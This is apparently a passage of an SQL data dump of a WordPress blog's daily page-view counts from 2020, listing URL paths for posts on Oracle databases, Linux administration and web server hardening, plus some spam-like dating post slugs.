(156,'/index.php/2020/03/28/nearly-all-organizations-get-the-first-couple-of-2/','post','2020-03-28',1,259),
(157,'/index.php/2020/03/28/loans-for-older-manufactured-housing-how-to-12/','post','2020-03-28',1,261),
(158,'/index.php/2020/03/28/it-is-tough-ahead-on-top-of-a-male-which-have/','post','2020-03-28',1,263),
(159,'/index.php/2020/03/28/exactly-about-the-greatest-help-guide-to-dating-4/','post','2020-03-28',4,265),
(160,'/index.php/2020/03/28/whilst-the-true-amounts-of-america-males-looking/','post','2020-03-28',1,255),
(161,'/index.php/2020/03/28/serbian-marriage-agency-27/','post','2020-03-28',1,253),
(162,'/index.php/2020/03/28/siberian-brides-27/','post','2020-03-28',1,257),
(163,'/index.php/2020/03/28/scandinavian-woman-144/','post','2020-03-28',1,251),
(164,'/index.php/about-me/','page','2020-03-28',1,51),
(165,'/','home','2020-03-29',21,0),
(166,'/index.php/2020/03/29/many-of-them-are-gents-that-married-currently-such-4/','post','2020-03-29',1,267),
(167,'/index.php/2020/03/29/wedding-by-abduction-soars-in-bihar-over-3-000-15/','post','2020-03-29',1,269),
(168,'/index.php/2020/03/29/pretty-south-girls-that-are-african-waiting-around-2/','post','2020-03-29',1,273),
(169,'/index.php/2020/03/29/temporary-remain-visa-process-in-serbia-common-law/','post','2020-03-29',1,275),
(170,'/index.php/2020/03/29/and-that-means-you-want-to-marry-a-moroccan-guy-2/','post','2020-03-29',1,271),
(171,'/','home','2020-03-30',16,0),
(172,'/index.php/2020/03/29/chinese-brides-well-ordered-handbook-for-browsing-10/','post','2020-03-30',1,277),
(173,'/index.php/2020/03/30/malaysia-females-prefer-chivalrous-deeds-and/','post','2020-03-30',1,279),
(174,'/index.php/2020/03/30/23-latest-nigerian-dresses-for-nigerian-brides-9/','post','2020-03-30',1,281),
(175,'/','home','2020-03-31',31,0),
(176,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-03-31',6,305),
(177,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-03-31',1,150),
(178,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-03-31',1,97),
(179,'/','home','2020-04-01',43,0),
(180,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-01',2,305),
(181,'/','home','2020-04-02',26,0),
(182,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-02',3,305),
(183,'/','home','2020-04-03',17,0),
(184,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-03',4,305),
(185,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-04-03',2,97),
(186,'/index.php/about-me/','page','2020-04-03',2,51),
(187,'/','home','2020-04-04',22,0),
(188,'/','home','2020-04-05',15,0),
(189,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-05',1,305),
(190,'/','home','2020-04-06',21,0),
(191,'/','home','2020-04-07',21,0),
(192,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-04-07',1,150),
(193,'/','home','2020-04-08',34,0),
(194,'/','home','2020-04-09',49,0),
(195,'/','home','2020-04-10',26,0),
(196,'/','home','2020-04-11',22,0),
(197,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-04-11',1,97),
(198,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-04-11',1,104),
(199,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-04-11',1,110),
(200,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-04-11',1,150),
(201,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-11',1,305),
(202,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-04-11',1,56),
(203,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-04-11',1,60),
(204,'/index.php/2020/02/02/backup-restore-progress/','post','2020-04-11',1,64),
(205,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-04-11',1,66),
(206,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-04-11',1,68),
(207,'/index.php/about-me/','page','2020-04-11',4,51),
(208,'/','home','2020-04-12',19,0),
(209,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-04-12',1,97),
(210,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-04-12',1,104),
(211,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-04-12',1,110),
(212,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-04-12',1,150),
(213,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-12',1,305),
(214,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-04-12',1,56),
(215,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-04-12',1,60),
(216,'/index.php/2020/02/02/backup-restore-progress/','post','2020-04-12',1,64),
(217,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-04-12',1,66),
(218,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-04-12',1,68),
(219,'/','home','2020-04-13',13,0),
(220,'/','home','2020-04-14',11,0),
(221,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-14',1,305),
(222,'/','home','2020-04-15',26,0),
(223,'/','home','2020-04-16',21,0),
(224,'/','home','2020-04-17',11,0),
(225,'/','home','2020-04-18',24,0),
(226,'/','home','2020-04-19',15,0),
(227,'/','home','2020-04-20',15,0),
(228,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-04-20',2,60),
(229,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-04-20',1,150),
(230,'/','home','2020-04-21',24,0),
(231,'/','home','2020-04-22',28,0),
(232,'/index.php/about-me/','page','2020-04-22',2,51),
(233,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-04-22',1,110),
(234,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-04-22',1,56),
(235,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-22',1,305),
(236,'/','home','2020-04-23',88,0),
(237,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-04-23',9,110),
(238,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-04-23',3,104),
(239,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-23',9,305),
(240,'/index.php/about-me/','page','2020-04-23',8,51),
(241,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-04-23',1,68),
(242,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-04-23',3,60),
(243,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-04-23',7,66),
(244,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-04-23',6,56),
(245,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-04-23',1,97),
(246,'/index.php/2020/02/02/backup-restore-progress/','post','2020-04-23',2,64),
(247,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-04-23',4,150),
(248,'/','home','2020-04-24',31,0),
(249,'/','home','2020-04-25',66,0),
(250,'/index.php/about-me/','page','2020-04-25',1,51),
(251,'/index.php/2020/04/24/create-local-yum-repository/','post','2020-04-25',2,315),
(252,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-04-25',1,97),
(253,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-04-25',1,305),
(254,'/','home','2020-04-26',44,0),
(255,'/','home','2020-04-27',31,0),
(256,'/index.php/about-me/','page','2020-04-27',1,51),
(257,'/','home','2020-04-28',36,0),
(258,'/','home','2020-04-29',20,0),
(259,'/index.php/about-me/','page','2020-04-29',1,51),
(260,'/','home','2020-04-30',26,0),
(261,'/','home','2020-05-01',15,0),
(262,'/','home','2020-05-02',24,0),
(263,'/','home','2020-05-03',16,0),
(264,'/','home','2020-05-04',17,0),
(265,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-05-04',1,97),
(266,'/','home','2020-05-05',13,0),
(267,'/','home','2020-05-06',13,0),
(268,'/','home','2020-05-07',17,0),
(269,'/','home','2020-05-08',21,0),
(270,'//blog/','home','2020-05-09',13,0),
(271,'/','home','2020-05-10',15,0),
(272,'/','home','2020-05-11',33,0),
(273,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-05-11',2,97),
(274,'/','home','2020-05-12',22,0),
(275,'/','home','2020-05-13',23,0),
(276,'/','home','2020-05-14',23,0),
(277,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-05-14',1,97),
(278,'/','home','2020-05-15',31,0),
(279,'/','home','2020-05-16',28,0),
(280,'/','home','2020-05-17',27,0),
(281,'/','home','2020-05-18',27,0),
(282,'/','home','2020-05-19',23,0),
(283,'/','home','2020-05-20',22,0),
(284,'/','home','2020-05-21',25,0),
(285,'/','home','2020-05-22',20,0),
(286,'/','home','2020-05-23',13,0),
(287,'/','home','2020-05-24',12,0),
(288,'/','home','2020-05-25',25,0),
(289,'/','home','2020-05-26',26,0),
(290,'/','home','2020-05-27',29,0),
(291,'/','home','2020-05-28',19,0),
(292,'/','home','2020-05-29',19,0),
(293,'/','home','2020-05-30',21,0),
(294,'/','home','2020-05-31',21,0),
(295,'/index.php/about-me/','page','2020-05-31',2,51),
(296,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-05-31',1,305),
(297,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-05-31',1,150),
(298,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-05-31',1,110),
(299,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-05-31',1,104),
(300,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-05-31',1,97),
(301,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-05-31',1,68),
(302,'/','home','2020-06-01',14,0),
(303,'/','home','2020-06-02',25,0),
(304,'/','home','2020-06-03',20,0),
(305,'/index.php','home','2020-06-04',21,0),
(306,'/index.php/about-me/','page','2020-06-04',1,51),
(307,'/','home','2020-06-05',27,0),
(308,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-06-05',1,150),
(309,'/','home','2020-06-06',16,0),
(310,'/','home','2020-06-07',11,0),
(311,'/','home','2020-06-08',25,0),
(312,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-06-08',2,97),
(313,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-06-08',1,66),
(314,'/','home','2020-06-09',16,0),
(315,'/','home','2020-06-10',22,0),
(316,'/','home','2020-06-11',21,0),
(317,'/','home','2020-06-12',21,0),
(318,'/','home','2020-06-13',27,0),
(319,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-06-13',1,110),
(320,'/index.php/about-me/','page','2020-06-13',1,51),
(321,'/','home','2020-06-14',14,0),
(322,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-06-14',3,97),
(323,'/','home','2020-06-15',20,0),
(324,'/','home','2020-06-16',14,0),
(325,'/','home','2020-06-17',19,0),
(326,'/','home','2020-06-18',20,0),
(327,'/','home','2020-06-19',40,0),
(328,'/','home','2020-06-20',18,0),
(329,'/','home','2020-06-21',28,0),
(330,'/','home','2020-06-22',17,0),
(331,'/','home','2020-06-23',38,0),
(332,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-06-23',1,60),
(333,'/','home','2020-06-24',27,0),
(334,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-06-24',3,97),
(335,'/','home','2020-06-25',33,0),
(336,'/index.php/about-me/','page','2020-06-25',3,51),
(337,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-06-25',1,150),
(338,'/','home','2020-06-26',29,0),
(339,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-06-26',4,97),
(340,'/','home','2020-06-27',34,0),
(341,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-06-27',1,97),
(342,'/','home','2020-06-28',25,0),
(343,'/','home','2020-06-29',34,0),
(344,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-06-29',3,97),
(345,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899','post','2020-06-29',2,56),
(346,'/','home','2020-06-30',42,0),
(347,'/','home','2020-07-01',21,0),
(348,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-07-01',1,150),
(349,'/','home','2020-07-02',20,0),
(350,'/','home','2020-07-03',22,0),
(351,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-07-03',3,97),
(352,'/','home','2020-07-04',28,0),
(353,'/','home','2020-07-05',21,0),
(354,'/','home','2020-07-06',11,0),
(355,'/','home','2020-07-07',21,0),
(356,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-07-07',3,97),
(357,'/','home','2020-07-08',26,0),
(358,'/','home','2020-07-09',46,0),
(359,'/','home','2020-07-10',28,0),
(360,'/','home','2020-07-11',24,0),
(361,'/index.php/about-me/','page','2020-07-11',1,51),
(362,'/','home','2020-07-12',20,0),
(363,'/','home','2020-07-13',18,0),
(364,'/','home','2020-07-14',33,0),
(365,'/','home','2020-07-15',57,0),
(366,'/index.php/about-me/','page','2020-07-15',1,51),
(367,'/','home','2020-07-16',22,0),
(368,'/index.php/about-me/','page','2020-07-16',1,51),
(369,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-07-16',1,97),
(370,'/','home','2020-07-17',34,0),
(371,'/','home','2020-07-18',45,0),
(372,'/','home','2020-07-19',24,0),
(373,'/','home','2020-07-20',22,0),
(374,'/','home','2020-07-21',23,0),
(375,'/','home','2020-07-22',42,0),
(376,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2020-07-22',1,27),
(377,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-07-22',2,110),
(378,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-07-22',2,104),
(379,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-07-22',1,97),
(380,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-07-22',1,68),
(381,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-07-22',1,66),
(382,'/index.php/2020/02/02/backup-restore-progress/','post','2020-07-22',1,64),
(383,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-07-22',1,60),
(384,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-07-22',1,56),
(385,'/index.php/about-me/','page','2020-07-22',1,51),
(386,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-07-22',4,305),
(387,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-07-22',4,150),
(388,'/','home','2020-07-23',29,0),
(389,'/','home','2020-07-24',22,0),
(390,'/','home','2020-07-25',27,0),
(391,'/','home','2020-07-26',32,0),
(392,'/','home','2020-07-27',34,0),
(393,'/','home','2020-07-28',23,0),
(394,'/','home','2020-07-29',41,0),
(395,'/','home','2020-07-30',14,0),
(396,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-07-30',1,97),
(397,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-07-30',1,104),
(398,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-07-30',1,110),
(399,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-07-30',1,150),
(400,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-07-30',1,305),
(401,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-07-30',1,56),
(402,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-07-30',1,60),
(403,'/index.php/2020/02/02/backup-restore-progress/','post','2020-07-30',1,64),
(404,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-07-30',1,66),
(405,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-07-30',1,68),
(406,'/index.php/about-me/','page','2020-07-30',1,51),
(407,'/','home','2020-07-31',23,0),
(408,'/','home','2020-08-01',19,0),
(409,'/index.php/2020/02/02/backup-restore-progress/','post','2020-08-01',1,64),
(410,'/','home','2020-08-02',23,0),
(411,'/','home','2020-08-03',49,0),
(412,'/index.php/2020/02/02/backup-restore-progress/','post','2020-08-03',3,64),
(413,'/','home','2020-08-04',26,0),
(414,'/','home','2020-08-05',17,0),
(415,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-08-05',1,110),
(416,'/','home','2020-08-06',36,0),
(417,'/','home','2020-08-07',20,0),
(418,'/','home','2020-08-08',9,0),
(419,'/','home','2020-08-09',21,0),
(420,'/','home','2020-08-10',19,0),
(421,'/','home','2020-08-11',26,0),
(422,'/index.php/about-me/','page','2020-08-11',1,51),
(423,'/','home','2020-08-12',20,0),
(424,'/','home','2020-08-13',24,0),
(425,'/','home','2020-08-14',18,0),
(426,'/','home','2020-08-15',28,0),
(427,'/index.php/about-me/','page','2020-08-15',2,51),
(428,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-08-15',2,305),
(429,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-08-15',2,150),
(430,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-08-15',2,110),
(431,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-08-15',2,104),
(432,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-08-15',2,97),
(433,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-08-15',2,68),
(434,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-08-15',2,66),
(435,'/index.php/2020/02/02/backup-restore-progress/','post','2020-08-15',2,64),
(436,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-08-15',2,60),
(437,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-08-15',2,56),
(438,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2020-08-15',2,27),
(439,'/','home','2020-08-16',18,0),
(440,'/index.php/about-me/','page','2020-08-16',1,51),
(441,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-08-16',2,66),
(442,'/','home','2020-08-17',24,0),
(443,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-08-17',1,150),
(444,'/','home','2020-08-18',23,0),
(445,'/','home','2020-08-19',20,0),
(446,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-08-19',2,110),
(447,'/','home','2020-08-20',25,0),
(448,'/','home','2020-08-21',17,0),
(449,'/','home','2020-08-22',45,0),
(450,'/','home','2020-08-23',15,0),
(451,'/','home','2020-08-24',29,0),
(452,'/index.php/about-me/','page','2020-08-24',1,51),
(453,'/','home','2020-08-25',19,0),
(454,'/','home','2020-08-26',25,0),
(455,'/','home','2020-08-27',26,0),
(456,'/','home','2020-08-28',29,0),
(457,'/index.php/about-me','page','2020-08-28',2,51),
(458,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure','post','2020-08-28',2,305),
(459,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress','post','2020-08-28',2,150),
(460,'/index.php/2020/02/25/connection-encryption-in-oracle-database','post','2020-08-29',2,110),
(461,'/','home','2020-08-29',18,0),
(462,'/index.php/about-me/','page','2020-08-29',1,51),
(463,'/','home','2020-08-30',24,0),
(464,'/','home','2020-08-31',37,0),
(465,'/','home','2020-09-01',61,0),
(466,'/','home','2020-09-02',18,0),
(467,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-02',1,97),
(468,'/','home','2020-09-03',17,0),
(469,'/','home','2020-09-04',35,0),
(470,'/index.php/2020/02/02/backup-restore-progress/','post','2020-09-04',1,64),
(471,'/','home','2020-09-05',16,0),
(472,'/','home','2020-09-06',28,0),
(473,'/','home','2020-09-07',22,0),
(474,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-09-07',1,68),
(475,'/','home','2020-09-08',24,0),
(476,'/index.php/about-me/','page','2020-09-08',1,51),
(477,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-09-08',1,305),
(478,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-09-08',1,150),
(479,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-08',2,110),
(480,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-09-08',1,104),
(481,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-08',1,97),
(482,'/','home','2020-09-09',82,0),
(483,'/index.php/about-me/','page','2020-09-09',1,51),
(484,'/','home','2020-09-10',17,0),
(485,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-09-10',1,56),
(486,'/','home','2020-09-11',30,0),
(487,'/','home','2020-09-12',25,0),
(488,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-13',2,110),
(489,'/','home','2020-09-13',20,0),
(490,'/','home','2020-09-14',21,0),
(491,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-14',2,110),
(492,'/','home','2020-09-15',37,0),
(493,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-09-15',2,68),
(494,'/','home','2020-09-16',18,0),
(495,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-09-16',1,68),
(496,'/','home','2020-09-17',34,0),
(497,'/index.php/2020/02/02/backup-restore-progress/','post','2020-09-17',2,64),
(498,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2020-09-17',1,27),
(499,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-17',2,110),
(500,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-09-17',2,104),
(501,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-17',1,97),
(502,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-09-17',1,68),
(503,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-09-17',1,66),
(504,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-09-17',1,60),
(505,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-09-17',1,56),
(506,'/index.php/about-me/','page','2020-09-17',1,51),
(507,'/','home','2020-09-18',22,0),
(508,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-09-18',1,150),
(509,'/','home','2020-09-19',50,0),
(510,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-19',2,110),
(511,'/index.php/about-me/','page','2020-09-19',1,51),
(512,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-09-19',1,150),
(513,'/','home','2020-09-20',20,0),
(514,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-20',6,97),
(515,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-21',3,97),
(516,'/','home','2020-09-21',22,0),
(517,'/','home','2020-09-22',14,0),
(518,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-22',2,97),
(519,'/index.php/about-me/','page','2020-09-22',1,51),
(520,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-22',2,110),
(521,'/','home','2020-09-23',15,0),
(522,'/','home','2020-09-24',41,0),
(523,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-09-24',1,56),
(524,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-09-24',4,150),
(525,'/index.php/about-me/','page','2020-09-24',1,51),
(526,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-24',1,97),
(527,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-09-24',1,104),
(528,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-24',1,110),
(529,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-09-24',1,305),
(530,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-09-24',1,68),
(531,'/','home','2020-09-25',21,0),
(532,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-25',2,110),
(533,'/','home','2020-09-26',32,0),
(534,'/index.php/about-me/','page','2020-09-26',1,51),
(535,'/','home','2020-09-27',24,0),
(536,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-09-27',2,150),
(537,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2020-09-27',2,27),
(538,'/','home','2020-09-28',42,0),
(539,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-09-28',2,66),
(540,'/index.php/about-me/','page','2020-09-28',2,51),
(541,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-09-28',2,68),
(542,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-09-28',1,150),
(543,'/','home','2020-09-29',43,0),
(544,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-09-29',4,150),
(545,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-09-29',3,110),
(546,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-09-29',5,104),
(547,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-09-29',5,305),
(548,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-29',3,97),
(549,'/index.php/about-me/','page','2020-09-29',3,51),
(550,'/','home','2020-09-30',43,0),
(551,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-09-30',3,97),
(552,'/index.php/about-me/','page','2020-09-30',3,51),
(553,'/','home','2020-10-01',32,0),
(554,'/','home','2020-10-02',56,0),
(555,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-10-02',1,56),
(556,'/index.php/about-me/','page','2020-10-02',1,51),
(557,'/','home','2020-10-03',20,0),
(558,'/','home','2020-10-04',32,0),
(559,'/','home','2020-10-05',26,0),
(560,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-10-05',1,56),
(561,'/','home','2020-10-06',57,0),
(562,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-10-06',3,110),
(563,'/','home','2020-10-07',36,0),
(564,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-10-07',2,110),
(565,'/','home','2020-10-08',61,0),
(566,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-10-08',2,104),
(567,'/index.php/about-me/','page','2020-10-08',1,51),
(568,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-10-08',2,305),
(569,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-10-08',1,150),
(570,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-10-08',1,110),
(571,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-10-08',1,97),
(572,'/','home','2020-10-09',40,0),
(573,'/','home','2020-10-10',43,0),
(574,'/index.php/about-me/','page','2020-10-10',2,51),
(575,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2020-10-10',4,305),
(576,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-10-10',4,150),
(577,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-10-10',4,110),
(578,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-10-10',4,104),
(579,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-10-10',4,97),
(580,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-10-10',3,68),
(581,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-10-10',3,66),
